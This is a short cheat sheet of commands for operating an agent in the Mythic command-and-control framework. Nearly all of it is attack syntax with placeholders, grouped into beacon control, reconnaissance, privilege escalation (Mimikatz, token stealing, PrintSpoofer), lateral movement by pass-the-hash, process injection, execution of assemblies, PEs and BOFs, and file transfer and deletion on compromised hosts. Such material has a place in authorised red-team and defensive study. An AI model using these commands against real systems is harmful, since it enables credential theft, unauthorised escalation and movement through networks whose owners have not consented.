# Mythic

## **Beacon Management (Real-Time C2 Control)**

```bash
# Set agent to real-time communication (no sleep)
Mythic > sleep 0 0

# Instruct agent to exit
Mythic > exit

# List all running jobs
Mythic > jobs

# Kill a specific job
Mythic > jobkill [jid]

# Load additional commands into agent
Mythic > load command1 command2 ...

# Link to a peer-to-peer (SMB/TCP) agent
Mythic > link

# Unlink a linked agent
Mythic > unlink
```

***

## **Information Gathering / Recon**

```bash
# List network interfaces and IP addresses
Mythic > ifconfig

# List running processes
Mythic > ps

# List directory contents
Mythic > ls -Path [path]

# Print current working directory
Mythic > pwd

# Display domain controllers
Mythic > net_dclist [domain.local]

# List shares on a remote machine
Mythic > net_shares -Computer [hostname]

# Show local groups on a machine
Mythic > net_localgroup [hostname]

# Show members of a local group
Mythic > net_localgroup_member -Group [groupname] -Computer [hostname]

# View network connections
Mythic > netstat -Tcp -Udp

# Take a screenshot
Mythic > screenshot
```

***

## **Privilege Escalation**

```bash
# Attempt to enable all possible privileges
Mythic > getprivs

# Use Mimikatz directly
Mythic > mimikatz -Command "privilege::debug"

# Steal token from a PID
Mythic > steal_token [pid]

# Impersonate a user with credentials
Mythic > make_token -username [user] -password [pass]

# PrintSpoofer to escalate to SYSTEM
Mythic > printspoofer -Command "cmd.exe"

# Revert to original token
Mythic > rev2self
```

***

## **Lateral Movement**

```bash
# Use Pass-the-Hash to run commands
Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe]

# Copy file to remote system
Mythic > cp -Path [source] -Destination [dest]

# List services or manipulate them
Mythic > sc -Query -Computer [host]

# Use PowerShell remoting (if applicable)
Mythic > powershell -Command "Invoke-Command ..."
```

***

## **Post-Exploitation / Execution**

```bash
# Run shell command
Mythic > shell whoami

# Run PowerShell in current process
Mythic > powershell -Command "Get-Process"

# Import PowerShell script
Mythic > powershell_import

# Inject PowerShell into a specific process
Mythic > psinject -PID [pid] -Command "..."

# Execute .NET assembly
Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical"

# Register .NET assembly
Mythic > register_assembly

# Execute inline .NET assembly
Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..."

# Execute unmanaged PE
Mythic > execute_pe -PE [binary.exe] -Arguments "..."

# Execute Beacon Object File (BOF)
Mythic > execute_coff -Coff [file.o] -Function [go]
```

***

## **File Transfer**

```bash
# Upload a file
Mythic > upload

# Download a file
Mythic > download -Path [path]

# Remove a file
Mythic > rm -Path [path]
```
